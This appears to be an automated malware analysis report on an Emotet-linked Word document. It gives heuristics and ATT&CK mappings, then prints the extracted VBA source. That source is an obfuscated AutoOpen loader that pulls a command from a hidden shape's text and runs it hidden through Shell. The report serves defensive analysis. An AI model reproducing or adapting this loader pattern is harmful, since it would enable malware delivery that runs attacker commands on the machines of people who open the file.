Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains a critical heuristic for an obfuscated auto-exec VBA loader and is detected by ClamAV as Emotet. The AutoOpen macro is designed to execute obfuscated code that likely downloads and executes a second-stage payload. The presence of legacy WordBasic auto-exec markers further supports the malicious intent.
Heuristics (6)
- ClamAV: Doc.Downloader.Emotet-6872657-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6872657-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3411 bytes |

SHA-256: 0408eddbc3d4dccd167d1064591f4525e1c5563eaed92e4a098d86154ecbcc98

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "bwiOniizVBh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
GZRGPjckc = "" + otXAwAiM + OKPqC + ActiveDocument.Name + zwZjG + CQtTi
ORSUlWtfX = iMtHYi & BcTKSYC & "\" & GZRGPjckc
If Dir(ORSUlWtfX) = "" Then
If Dir(Replace(ORSUlWtfX, "IiINp", "ziAHWm")) <> "" Then
ORSUlWtfX = Replace(ORSUlWtfX, "jjKCIKmQ", ".SJiwBh")
End If
End If
ihUvahs = "" + jrBfItO + YbGlVsRbs + ActiveDocument.Name + XjLkUFN + ZMzBAsd
sopMz = ZmvWYrOk & VCtUH & "\" & ihUvahs
If Dir(sopMz) = "" Then
If Dir(Replace(sopMz, "QssfHCJj", "rjXfak")) <> "" Then
sopMz = Replace(sopMz, "PPYcRw", ".vRlUBwX")
End If
End If
HmcYjM = "" + ZbuVZKmqu + WKDnz + ActiveDocument.Name + nQodN + awAQJ
wNViIns = zcllkUBQR & VZbVdVq & "\" & HmcYjM
If Dir(wNViIns) = "" Then
If Dir(Replace(wNViIns, "rRwbobWl", "MjcFZZJ")) <> "" Then
wNViIns = Replace(wNViIns, "nHpDtPl", ".AjYBw")
End If
End If
KwOvo = "" + wlKQZpwtH + wSrctDLrl + ActiveDocument.Name + zWslC + IEqfIDM
VovzXKJYw = wBAMhV & qBlRBGfbf & "\" & KwOvo
If Dir(VovzXKJYw) = "" Then
If Dir(Replace(VovzXKJYw, "KmnfOB", "ZVQRrLk")) <> "" Then
VovzXKJYw = Replace(VovzXKJYw, "bzwKF", ".csZNvjrDb")
End If
End If
MiTcPhizNwJ = "" + DzdHu + QNZahLX + Shapes("mKuUMOR").TextFrame.ContainingRange + RbMITfz + Zouzki
SolnGO = "" + zHwLGpqdi + TwBiCJfw + ActiveDocument.Name + AHYAiX + ilJVc
zcfkwpFja = wHSIXLSHi & PoGNcD & "\" & SolnGO
If Dir(zcfkwpFja) = "" Then
If Dir(Replace(zcfkwpFja, "HIkSz", "tBbWQ")) <> "" Then
zcfkwpFja = Replace(zcfkwpFja, "UlboJJfJ", ".joaHSnA")
End If
End If
bCZwCbS = "" + jZtdY + IGlzGN + ActiveDocument.Name + FwGHiRU + NXnjXPk
hhScujH = jVHAhYBbu & YqToDqcs & "\" & bCZwCbS
If Dir(hhScujH) = "" Then
If Dir(Replace(hhScujH, "VfRclziq", "qKGtJfobF")) <> "" Then
hhScujH = Replace(hhScujH, "NbDXj", ".nWCGuAFX")
End If
End If
Const ioQhnoLktL = vbHide
NDJqst = "" + VbTWkYP + jZjPMXC + ActiveDocument.Name + EtwqvvDC + PcTQsXVM
TlaUKKiOs = lipcA & LdFOZlIU & "\" & NDJqst
If Dir(TlaUKKiOs) = "" Then
If Dir(Replace(TlaUKKiOs, "Vvjjrmf", "LzRmrl")) <> "" Then
TlaUKKiOs = Replace(TlaUKKiOs, "VNtKL", ".ZXQiUvv")
End If
End If
Shell@ MiTcPhizNwJ + KCqCG + BMKkjE, ioQhnoLktL
ziaWlatf = "" + ABFHFKl + LqYZNW + ActiveDocument.Name + izfUz + SWFNGJqF
SZcbEN = LbpwHLuC & mFDtmDkjW & "\" & ziaWlatf
If Dir(SZcbEN) = "" Then
If Dir(Replace(SZcbEN, "GRivYa", "wHHTdFJ")) <> "" Then
SZcbEN = Replace(SZcbEN, "YHJzY", ".JQmihfzuz")
End If
End If
YrOvi = "" + jZiVajPI + TYJQYpl + ActiveDocument.Name + ADFGmS + nDrHXHh
iwWps = rkDUwGj & LBuvYSw & "\" & YrOvi
If Dir(iwWps) = "" Then
If Dir(Replace(iwWps, "cQqPO", "aJaKAMX")) <> "" Then
iwWps = Replace(iwWps, "QnWnlBsAb", ".HChXpHkXl")
End If
End If
End Sub